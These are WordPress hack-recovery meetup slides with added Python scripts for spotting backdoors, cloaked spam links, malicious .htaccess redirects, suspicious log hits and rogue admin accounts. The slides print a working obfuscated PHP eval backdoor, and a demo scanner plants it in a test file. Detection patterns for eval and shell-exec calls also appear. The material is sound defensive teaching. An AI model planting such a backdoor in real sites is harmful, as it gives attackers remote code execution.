YOUR SITE IS AND IS NOT HACKED
@ASKWPGIRL
SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not hacked until you open the box and find out.
<?php
// Sample backdoor from the slide: $s20 is assembled letter by letter from "stop_" so the
// string "_POST" never appears in the file; whatever arrives in the q53b3a6 POST
// parameter is then handed to eval().
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}
?>
WordPress Instructor and Custom Theme Developer
Using WordPress since 2007 (version 2.2)
Not a security expert, but I play one on WordPress.tv
Angela Bowman
Ask WP Girl @askwpgirl
WHAAA?
1
WHY DO HACKERS HACK?
Deface sites for fun
Add spammy links to bad web neighborhoods (SEO spam)
Hijack site to add spam, porn, gambling, pay-day loan content
Steal sensitive information to sell
Distribute malware to personal computers
Use server resources for distributed attacks
WHAT DO HACKERS ACTUALLY DO?
Create new accounts with admin privileges
Reset passwords of multiple accounts
Inject malicious code into content
Add malicious code to existing files or new files
Redirect your website by editing .htaccess file
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
WHY SHOULD YOU CARE?
Your site can start running really slow
Your SEO could take a nose dive
Your site could be blacklisted or taken down by your web host
Your site could be added to the Phish Tank, which is hard to get out of
You could be sued by customers for damages
Your site can become unusable
TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST
Many hacks are hidden
WHY ARE WORDPRESS SITES VULNERABLE?
PHP and MySQL are inherently vulnerable: it is easy to write hackable code that works!
Current WordPress version is very secure
Themes and plugins are not all created equal
Hosting security varies
Login credentials can be compromised
Personal computer may be infected
HACK STATS
(pie chart: share of hacks by root cause)
41% Hosting
22% Plugins
29% Themes
8% Weak Passwords
RECENT VULNERABILITIES
Google Analytics
WordPress 4.2.1
Backup to Dropbox
FancyBox
TwentyFifteen
Revolution Slider
Gravity Forms
JetPack
Database of all vulnerable plugins and themes: https://wpvulndb.com/
RECENT STATS
100,000+ WordPress sites compromised through Slider Revolution security vulnerability
800,000 banking credentials stolen using hacked WordPress sites
600,000 WordPress websites compromised through Fancybox plugin security vulnerability
http://www.databreachtoday.com/hackers-grab-800000-banking-credentials-a-7416
http://wptavern.com/hackers-hijack-fancybox-plugin-to-deface-wordpress-sites-with-isis-propaganda
LOW HANGING FRUIT
Vulnerabilities immediately published on the web
Hackers write bots to exploit vulnerabilities
Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
COMMON EXPLOITS AND HOW TO FIX
2
1 - Backdoors
PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
IT'S VERY COMMON THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE SITE CODE, AND IT'S IMPOSSIBLE TO DETECT THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
Removing Backdoors
Check WordPress core integrity using the Sucuri plugin: https://wordpress.org/plugins/sucuri-scanner/
Delete and reinstall WordPress core files, plugins, and themes
Check wp-content and uploads folder carefully for hacked PHP files
Run https://wordpress.org/plugins/gotmls/ to check for hacked files in the wp-content folder
(Screenshot: Gravity Forms hack. Which of these files is not like the others?)
DIY HACK RECOVERY
Via SFTP (preferred) or FTP
1 Backup: Download everything. Good to examine later for details of the hack if needed.
2 Delete all except: cgi-bin, .htaccess, wp-config.php (examine these)
3 Upload fresh: WordPress, themes, plugins, cleaned uploads
(Screenshot: Hmmmm? PHP in a CSS folder?)
Look for modified dates
Look for unusual names
Compare file list to original download
Look for file types that don’t belong
Check commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php
Any file can be hacked!
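The four checks on this slide (modified dates, odd names, PHP where only static files belong, comparison against a clean download) can be run as a script over the copy of the site you downloaded in recovery step 1. The script below is an added example, not part of the talk or of any plugin it mentions; the demo site tree it builds is constructed, and it plants the slide-2 backdoor into a css/ folder so the checks have something to find. It also greps for the code constructs that obfuscated backdoors lean on, which the slide does not cover.

```python
"""Scan a downloaded copy of a WordPress site for likely backdoors.

Run it against the local copy pulled down over SFTP (recovery step 1), never
against the live server. The sample site tree is constructed for the demo.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# Constructs legitimate WordPress, theme and plugin code rarely combines.
# A hit means "read this file", not "this file is malicious".
SUSPICIOUS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "gzinflate": re.compile(r"\bgzinflate\s*\("),
    "shell-exec": re.compile(r"\b(system|exec|shell_exec|passthru)\s*\("),
    # ${$var}['...']: superglobal name assembled at runtime, as in the slide-2 sample
    "variable-variable-superglobal": re.compile(r"\$\{\s*\$\w+\s*\}\s*\["),
}

# Path fragments where a PHP file has no business living.
NO_PHP_DIRS = ("/wp-content/uploads/", "/css/", "/images/", "/fonts/", "/js/")


def scan_file(path, root, recent_days=7, now=None):
    """Return [(reason, relative_path)] findings for one file."""
    findings = []
    rel = path.relative_to(root).as_posix()
    now = time.time() if now is None else now
    name = path.name.lower()
    if name.endswith((".php", ".phtml", ".php5")) or ".php." in name:
        if any(frag in "/" + rel for frag in NO_PHP_DIRS):
            findings.append(("php-in-static-dir", rel))
        text = path.read_text(encoding="utf-8", errors="ignore")
        for reason, rx in SUSPICIOUS.items():
            if rx.search(text):
                findings.append((reason, rel))
        # Packed payloads tend to arrive as one very long line
        if any(len(line) > 500 for line in text.splitlines()):
            findings.append(("long-line", rel))
    # Fresh modification times stand out when the owner changed nothing
    if now - path.stat().st_mtime < recent_days * 86400:
        findings.append(("recently-modified", rel))
    return findings


def scan_site(root, expected=None):
    """Walk the tree; return {reason: [relative paths]}.

    `expected` is the file list from a clean download of the same WordPress,
    theme and plugin versions; anything not in it is reported too.
    """
    root = Path(root)
    report = {}
    present = set()
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        present.add(path.relative_to(root).as_posix())
        for reason, rel in scan_file(path, root):
            report.setdefault(reason, []).append(rel)
    if expected is not None:
        extra = sorted(present - set(expected))
        if extra:
            report["not-in-original-download"] = extra
    return report


# ---- constructed demo site (not a real installation) ----
CLEAN_FILES = {
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
    "wp-content/themes/demo/style.css": "/* Theme Name: Demo */\n",
    "wp-content/uploads/2015/05/photo.jpg": "fake image bytes\n",
}
PLANTED_FILES = {
    # the obfuscated eval backdoor shown on slide 2, dropped into a css/ folder
    "wp-content/themes/demo/css/db12.php":
        '<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);'
        "if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>",
    "wp-content/uploads/2015/05/css.php": "<?php echo base64_decode('aGk='); ?>",
}


def build_sample_site():
    """Create the demo tree in a temp dir; clean files get an old mtime."""
    root = Path(tempfile.mkdtemp(prefix="wp-demo-"))
    for rel, body in {**CLEAN_FILES, **PLANTED_FILES}.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    old = time.time() - 90 * 86400
    for rel in CLEAN_FILES:
        os.utime(root / rel, (old, old))
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for reason, paths in scan_site(site, expected=CLEAN_FILES).items():
        print(f"{reason:30s} {paths}")
```

Point `scan_site()` at the downloaded site folder and, for `expected`, at the file list of a fresh WordPress/theme/plugin download of the same versions. Every reason is a prompt to open the file: legitimate plugins do occasionally call base64_decode, and a theme update will make many files "recently modified", so read the hits rather than deleting on sight.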
2 - Drive by Downloads
Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers. Easy for scanners to detect.
Cleaning up Drive by Downloads
Use Sucuri SiteCheck to scan site; read about the hack
Disable JavaScript before hitting your site: you don’t want to end up infecting your own computer while checking your site.
Remove hacked code from content or files.
Commonly hacked core files: index.php and wp-blog-header.php
Commonly hacked theme files: index.php, functions.php, header.php, footer.php
Monitor site
3 - Pharma Hack
Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked.
Cleaning up Pharma Hack
Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to scan site using different devices to find hack
Search site with Google: site:yoursitename.com
Same clean up as Drive by Downloads
Can be cross-infected from other sites on server/hosting account
Read this: https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
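The drive-by and pharma slides above both come down to "what is in the page that should not be there": scripts or iframes pulled from someone else's host, and links that are only served when the visitor looks like a search engine. The script below is an added example, not from the talk or from botsvsbrowsers.com; it does the User-Agent swap with plain urllib and diffs the two renderings. The two HTML pages in it are constructed, with example.com standing in for your own domain, so it runs without touching the network.

```python
"""Compare what a search-engine crawler sees with what a browser sees, and list
scripts/iframes pulled from other hosts.

Covers the drive-by (injected <script>/<iframe>) and pharma (cloaked spam
link) checks above. Added example, not from the talk; fetch_as() is plain
urllib and is not exercised by the demo, whose two pages are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
from urllib.request import Request, urlopen

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
SPAM_WORDS = ("viagra", "cialis", "pharmacy", "casino", "payday", "levitra")


class PageCollector(HTMLParser):
    """Collect <a href> (with link text) and <script src>/<iframe src> targets."""

    def __init__(self):
        super().__init__()
        self.links, self.embeds = [], []
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a":
            self._href, self._text = attrs.get("href", ""), []
        elif tag in ("script", "iframe") and attrs.get("src"):
            self.embeds.append((tag, attrs["src"]))

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def parse(html):
    p = PageCollector()
    p.feed(html)
    return p


def fetch_as(url, user_agent, timeout=15):
    """Fetch url with a chosen User-Agent string (live network call)."""
    req = Request(url, headers={"User-Agent": user_agent})
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def _host(url):
    return urlparse(url).netloc.lower().split(":")[0]


def external_embeds(html, site_host):
    """Scripts and iframes loaded from a host other than the site's own."""
    return [(tag, src) for tag, src in parse(html).embeds
            if _host(src) and _host(src) != site_host]


def cloaked_links(bot_html, browser_html, site_host):
    """Links served to the crawler but absent from the browser rendering."""
    browser_hrefs = {h for h, _ in parse(browser_html).links}
    findings = []
    for href, text in parse(bot_html).links:
        if href in browser_hrefs:
            continue
        reasons = []
        if _host(href) and _host(href) != site_host:
            reasons.append("external")
        if any(w in (text + " " + href).lower() for w in SPAM_WORDS):
            reasons.append("spam-keyword")
        findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# ---- constructed pages; example.com stands in for your site ----
BROWSER_HTML = """<html><head><script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="http://cdn.malware.example.net/x.js"></script></head>
<body><h1>Welcome</h1>
<a href="/about/">About</a> <a href="http://example.com/contact/">Contact</a>
<iframe src="http://example.com/map/"></iframe>
</body></html>"""
BOT_HTML = BROWSER_HTML.replace(
    "</body>",
    '<div style="display:none"><a href="http://pharma.example.net/buy">cheap viagra online</a>'
    '<a href="/wp-content/uploads/css.php?p=1">more</a></div></body>')


if __name__ == "__main__":
    print("external embeds:", external_embeds(BROWSER_HTML, "example.com"))
    for f in cloaked_links(BOT_HTML, BROWSER_HTML, "example.com"):
        print("cloaked:", f)
```

Against a live site the call is `cloaked_links(fetch_as(url, GOOGLEBOT_UA), fetch_as(url, BROWSER_UA), "yoursite.com")`, run from a machine with JavaScript off in the browser as the slide advises, since the script only reads the HTML and never executes it. A known CDN or analytics host will show up under external embeds, so keep a list of the ones you added yourself; and some cloaking keys on the referrer or the crawler's IP range rather than the User-Agent, which is exactly why the slide also says to search Google with site:yoursitename.com.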
4 - Malicious Redirects
Redirects traffic from your website to another, typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone
(Screenshot: hacked .htaccess file)
Finding and Removing Malicious Redirects
Listen when someone tells you that they tried to visit your site and couldn’t, and find out which browser or device they were using at the time.
Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to verify
Scan with Sucuri’s SiteCheck: https://sitecheck.sucuri.net/
Check all the .htaccess files on the server and remove the redirect.
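"Check all the .htaccess files" is easier when a script reads them for you. The example below is added here and is not from the talk; it walks every .htaccess in the downloaded site copy and reports rules that redirect to another host, together with the RewriteCond lines that gate them, so a phone-only redirect is called out as such. It understands only the handful of Apache directives involved, and the sample .htaccess is constructed: the stock WordPress block followed by a planted mobile-and-search-referrer redirect.

```python
"""Audit .htaccess files for redirects that send visitors off-site, including
the device- or referrer-gated kind the slide describes.

Added example, not from the talk. It understands only the small subset of
Apache syntax involved (RewriteCond, RewriteRule, Redirect, RedirectMatch);
the sample .htaccess is constructed, with example.com standing in for your site.
"""
import re
from pathlib import Path
from urllib.parse import urlparse

COND_RX = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}\s+(\S+)", re.I)
RULE_RX = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
REDIRECT_RX = re.compile(
    r"^\s*Redirect(?:Match)?\s+(?:\d{3}\s+|permanent\s+|temp\s+)?(\S+)\s+(\S+)", re.I)
GATING_VARS = ("HTTP_USER_AGENT", "HTTP_REFERER", "REMOTE_ADDR", "HTTP_HOST")


def _is_external(target, site_host):
    host = urlparse(target).netloc.lower().split(":")[0]
    return bool(host) and host != site_host.lower()


def _finding(lineno, target, conds, flags):
    gated = [f"{var} {pattern}" for var, pattern in conds if var in GATING_VARS]
    return {
        "line": lineno,
        "target": target,
        "flags": flags,
        "conditions": gated,
        # only some visitors are redirected: exactly the "works for me" hack
        "device-specific": any(c.startswith("HTTP_USER_AGENT") for c in gated),
    }


def audit_htaccess(text, site_host):
    """Return every rule that redirects to another host, with its gating conditions."""
    findings, pending = [], []   # pending RewriteConds apply to the next RewriteRule only
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = COND_RX.match(line)
        if m:
            pending.append((m.group(1).upper(), m.group(2)))
            continue
        m = RULE_RX.match(line)
        if m:
            conds, pending = pending, []
            target, flags = m.group(2), m.group(3) or ""
            if _is_external(target, site_host):
                findings.append(_finding(lineno, target, conds, flags))
            continue
        m = REDIRECT_RX.match(line)
        if m and _is_external(m.group(2), site_host):
            findings.append(_finding(lineno, m.group(2), [], "Redirect"))
    return findings


def audit_tree(root, site_host):
    """Audit every .htaccess below root (point it at the downloaded site copy)."""
    results = {}
    for path in sorted(Path(root).rglob(".htaccess")):
        found = audit_htaccess(path.read_text(errors="ignore"), site_host)
        if found:
            results[path.relative_to(root).as_posix()] = found
    return results


# ---- constructed sample: the stock WordPress block plus a planted redirect ----
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteCond %{HTTP_USER_AGENT} (android|iphone|ipad|blackberry) [NC]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule ^(.*)$ http://redirect.example.net/go.php?u=$1 [R=302,L]
Redirect 301 /old-page/ http://example.com/new-page/
"""

if __name__ == "__main__":
    for f in audit_htaccess(SAMPLE_HTACCESS, "example.com"):
        print(f)
```

A redirect to your own domain (the 301 in the sample) is ignored on purpose, since site owners add those legitimately; anything pointing elsewhere deserves a look. The .htaccess route is the common one the slide names, but a redirect can also be planted in a theme's header.php or injected JavaScript, so a clean audit here does not close the case on its own.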
Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?
Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
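The raw access log is where the strangely named PHP file shows itself: a handful of addresses POSTing to one file under wp-content that nothing on the site links to. The script below is an added example, not from the talk or from cPanel; it reads Apache/cPanel combined-format log lines and ranks every PHP request that falls outside the entry points a stock WordPress install exposes. The log lines in it are constructed and use RFC 5737 documentation addresses, so no real visitor is implied.

```python
"""Triage raw access logs for hits on PHP files a WordPress site should not
be serving: the "strangely named PHP file" pattern from the slide.

Added example, not from the talk. Expects Apache/cPanel "combined" log
format. The log lines below are constructed; the addresses are RFC 5737
documentation IPs, so no real visitor is implied.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlparse

LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The only PHP entry points a stock install exposes directly.
KNOWN_PHP = {"/index.php", "/wp-login.php", "/xmlrpc.php", "/wp-cron.php",
             "/wp-comments-post.php", "/wp-trackback.php", "/wp-signup.php"}


def parse_line(line):
    """Dict of fields for a combined-format line, or None if it does not parse."""
    m = LOG_RX.match(line)
    return m.groupdict() if m else None


def is_unexpected_php(path):
    """PHP requested outside the normal front-end and wp-admin surface."""
    p = path.lower()
    if ".php" not in p:
        return False
    return p not in KNOWN_PHP and not p.startswith("/wp-admin/")


def triage(lines):
    """Summarise unexpected PHP hits per path: volume, client IPs, POSTs, 2xx answers."""
    hits = defaultdict(lambda: {"count": 0, "post": 0, "ok": 0, "ips": Counter()})
    unparsed = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        path = urlparse(rec["target"]).path
        if not is_unexpected_php(path):
            continue
        h = hits[path]
        h["count"] += 1
        h["post"] += rec["method"] == "POST"      # backdoors are driven by POST
        h["ok"] += rec["status"].startswith("2")  # ...and they answer 200, not 404
        h["ips"][rec["ip"]] += 1
    ranked = sorted(hits.items(), key=lambda kv: (kv[1]["post"], kv[1]["count"]), reverse=True)
    return {"unparsed": unparsed,
            "paths": [(p, dict(h, ips=dict(h["ips"]))) for p, h in ranked]}


# ---- constructed log excerpt (RFC 5737 addresses; example.com is the site) ----
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2015:03:14:07 -0600] "POST /wp-content/uploads/2015/05/css.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2015:03:14:09 -0600] "POST /wp-content/uploads/2015/05/css.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - - [12/May/2015:03:20:41 -0600] "GET /wp-content/themes/demo/css/db12.php?x=1 HTTP/1.1" 200 77 "-" "python-requests/2.7.0"
192.0.2.10 - - [12/May/2015:08:00:02 -0600] "GET /index.php HTTP/1.1" 200 10240 "-" "Mozilla/5.0 (Windows NT 6.1)"
192.0.2.10 - - [12/May/2015:08:00:03 -0600] "GET /wp-content/themes/demo/style.css HTTP/1.1" 200 3000 "http://example.com/" "Mozilla/5.0 (Windows NT 6.1)"
192.0.2.11 - - [12/May/2015:08:05:13 -0600] "POST /wp-login.php HTTP/1.1" 302 0 "http://example.com/wp-login.php" "Mozilla/5.0 (Macintosh)"
192.0.2.12 - - [12/May/2015:08:06:00 -0600] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 45 "-" "Mozilla/5.0"
this line is not a log record
"""

if __name__ == "__main__":
    summary = triage(SAMPLE_LOG.splitlines())
    print("unparsed lines:", summary["unparsed"])
    for path, info in summary["paths"]:
        print(path, info)
```

Feed it the file cPanel hands you under Raw Access (gunzip it first if it is compressed): `triage(open("example.com", encoding="utf-8", errors="ignore"))`. Some plugins do expose their own PHP files for direct requests, so a flagged path under wp-content/plugins should be checked against a fresh download of that plugin before it is treated as a backdoor; a PHP file under wp-content/uploads has no such excuse. Country lookups on the IPs, as on the slide, are a hint about intent, not evidence on their own.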
MONITORING TIPS
Use Google Search Console!
Google Webmaster Tools/Search Console
Search Queries – you can spot queries irrelevant to your site.
Links to Your Site – you can find suspicious incoming links here.
Internal Links – this report can help reveal rogue sections of your site.
http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
Audit Activity on Site
https://wordpress.org/plugins/wp-simple-firewall/
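The Users screen in the dashboard can be made to lie by a compromised plugin or theme, so the reliable way to find "your new admin friends" is to ask the database which accounts hold the administrator role. The example below is added here and is not from the talk or from the snipe.net post; it runs that query against an in-memory SQLite copy of wp_users and wp_usermeta filled with constructed rows, and then flags admins that are not on your own list or whose names are blank or padded with whitespace so they are easy to overlook. On a real site the same SQL runs in phpMyAdmin or the mysql client, with "wp_" replaced by the table prefix in wp-config.php.

```python
"""List every account holding the administrator role straight from the
database, instead of trusting the dashboard's Users screen.

Added example, not from the talk. The rows live in an in-memory SQLite copy
of wp_users/wp_usermeta built from constructed data; on a real site run
ADMIN_QUERY in phpMyAdmin or the mysql client, swapping "wp_" for the table
prefix set in wp-config.php.
"""
import sqlite3

# WordPress keeps roles in wp_usermeta as a PHP-serialized array under
# meta_key "<prefix>capabilities"; a LIKE on the serialized text is enough.
ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered, u.display_name, m.meta_value
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%'
ORDER BY u.user_registered, u.ID
"""
FIELDS = ("ID", "login", "email", "registered", "display_name", "caps")


def list_admins(conn):
    """Every administrator account, oldest first."""
    return [dict(zip(FIELDS, row)) for row in conn.execute(ADMIN_QUERY)]


def audit_admins(conn, known_logins):
    """Admins you did not create, plus traits that make an account easy to overlook."""
    report = []
    for a in list_admins(conn):
        flags = []
        if a["login"] not in known_logins:
            flags.append("not-in-known-list")
        # blank display names and whitespace-padded logins render as near-empty rows
        if not a["display_name"] or a["login"] != a["login"].strip():
            flags.append("blank-or-padded-name")
        if flags:
            report.append((a["login"], flags))
    return report


def sample_db():
    """Constructed wp_users/wp_usermeta with one real admin and two planted ones."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
    CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT,
                           user_registered TEXT, display_name TEXT);
    CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                              meta_key TEXT, meta_value TEXT);
    INSERT INTO wp_users VALUES
      (1, 'angela',   'angela@example.com', '2007-05-16 10:00:00', 'Angela'),
      (2, 'editor',   'editor@example.com', '2012-01-03 09:12:00', 'Site Editor'),
      (3, 'support ', 'x@mail.example.net', '2015-05-11 03:15:22', ''),
      (4, 'admin',    'none@example.org',   '2015-05-11 03:16:40', 'admin');
    INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES
      (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
      (2, 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}'),
      (3, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
      (4, 'wp_capabilities', 'a:2:{s:10:"subscriber";b:1;s:13:"administrator";b:1;}');
    """)
    return conn


if __name__ == "__main__":
    db = sample_db()
    for login, flags in audit_admins(db, known_logins={"angela"}):
        print(f"{login!r}: {', '.join(flags)}")
```

The registration timestamps are worth reading alongside the flags: two administrators created a minute apart in the middle of the night, as in the sample, are the signature of an automated hack rather than a colleague. Once the rogue accounts are gone, reset every remaining password as the next slide says, because whatever created them still knows the old ones.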
IMMEDIATELY CHANGE PASSWORDS
Use Sucuri plugin to generate new security keys
Reset all passwords, including WordPress users, FTP, web hosting, control panel
Scan computer for viruses!
See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK
If hackers got admin access to site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
Or contact sucuri.net for site clean up and monitoring
REQUEST SITE REVIEW
If Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are certain you’ve cleaned up all hacked files:
https://support.google.com/webmasters/answer/168328?hl=en
SECURITY BASICS
3
UPDATE UPDATE UPDATE
Timely updates are critical for security.
Tools: iControlWP, InfiniteWP, Jetpack, ManageWP
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
UPDATING PREMIUM THEMES AND PLUGINS
Often a manual process: download and FTP new files
Bundled plugins are not supported or auto-updated
Enter license key/purchase code in settings to receive updates
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
SECURE YOUR LOGIN
Online generator: http://www.pctools.com/guides/password/
Track passwords: http://agilebits.com/products/1Password
Enable two-factor authentication: http://askwpgirl.com/wordpress-two-factor-authentication-plugins/
RUN A TIGHT SHIP!
Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam filtering (Akismet plugin)
GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
Managed WordPress Hosts:
SiteGround
WP Engine
Get Flywheel
Web Synthesis
Pantheon
EFFECTIVE SECURITY PLUGIN FEATURES
Limit login access
Block bad URL requests with a firewall
Audit activity
Security through obscurity is not security
IP addresses don’t matter and should not be used as the foundation of a WordPress security policy
My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/
Does all the above and more. Will notify you of vulnerable plugins.
BACKUPS
Common wisdom is to back up your site
Backups are to your site what major medical health care coverage is to your health
Usually only helpful in case of a disaster
Services: VaultPress and WorpDrive are good hosted solutions!
Plugins: BackupBuddy (paid), BackWPup, Duplicator
SECURE YOUR COMPUTER
Scan for viruses and trojans
Be careful about downloading stuff!!!!
RESOURCES
http://snipe.net/2010/01/when-wordpress-gets-hacked/
https://support.google.com/webmasters/answer/163633?rd=1 ***
http://aw-snap.info/articles/find-backdoor.php
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://sucuri.net - free scan, hack recovery, site monitoring, great posts on how to clean up specific hacks
http://askwpgirl.com/nuke-it-from-orbit
https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/
https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/
About the banking hack: https://www.proofpoint.com/es/node/327
Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc
http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
CONTACT
facebook.com/askwpgirl
twitter.com/askwpgirl
http://askwpgirl.com
http://boulderdigitalarts.com
One-on-one consulting third Friday of every month at Boulder Digital Arts
Six-week theme customization course in Colorado and online.
SEO and Best Maintenance Tips Newsletter: http://askwpgirl.com

Security Presentation for Boulder WordPress Meetup

  • 1. YOUR SITE 
 IS AND IS NOT HACKED @ASKWPGIRL
  • 2. SCHRODINGER’S WEBSITE You must assume your site is both hacked and not hacked until you open the box and find out. <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2]. $qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($ {$s20}['q53b3a6']);}?>
  • 3. WordPress Instructor and Custom Theme Developer Using WordPress Since 2007 —Version 2.2 Not a security expert, but I play one on WordPress.tv Angela Bowman 
 Ask WP Girl @askwpgirl
  • 5. WHY DO HACKERS HACK? Deface sites for fun Add spammy links to bad web neighborhoods (SEO spam) Hijack site to add spam, porn, gambling, pay-day loans content Steal sensitive information to sell Distribute malware to personal computers Use server resources for 
 distributed attacks
  • 6. WHAT DO HACKERS ACTUALLY DO? Create new accounts with admin privileges Reset passwords of multiple accounts Inject malicious code into content Add malicious code to existing files or new files Redirect your website by editing .htaccess file http://www.wpmayor.com/wordpress-security-based-facts-statistics/
  • 7. WHY SHOULD YOU CARE? Your site can start running 
 really slow Your SEO could take a nose 
 dive Your site could be blacklisted or taken down by your web host Your site could be added to the Phish Tank which is hard to get out of You could be sued by 
 customers for damages Your site can become unusable
  • 8. TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST Many hacks are hidden
  • 9. WHY ARE WORDPRESS SITES VULNERABLE? PHP and MySQL inherently vulnerable - easy to write hackable code that works! Current WordPress version very secure Themes and plugins not all created equal Hosting security varies Login credentials can be compromised Personal computer may be infected
  • 10. HACK STATS 29% 8% 22% 41% 41% Hosting 22% Plugins 29% Themes 8% Weak Passwords
  • 11. RECENT VULNERABILITIES Google Analytics WordPress 4.2.1 Backup to Dropbox FancyBox TwentyFifteen Revolution SliderGravity Forms JetPack Database of all vulnerable plugins and themes: https://wpvulndb.com/
  • 12. RECENT STATS
     100,000+ WordPress Sites Compromised through Slider Revolution Security Vulnerability
     800,000 banking credentials stolen using hacked WordPress sites
     600,000 WordPress Websites Compromised through Fancybox Plugin Security Vulnerability
     http://www.databreachtoday.com/hackers-grab-800000-banking-credentials-a-7416
     http://wptavern.com/hackers-hijack-fancybox-plugin-to-deface-wordpress-sites-with-isis-propaganda
  • 13. LOW HANGING FRUIT
     Vulnerabilities immediately published on the web
     Hackers write bots to exploit vulnerabilities
     Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
  • 15. 1 - Backdoors
     PHP files uploaded to your server and accessed remotely.
     Severely affect site and server performance.
     Not easy to find.
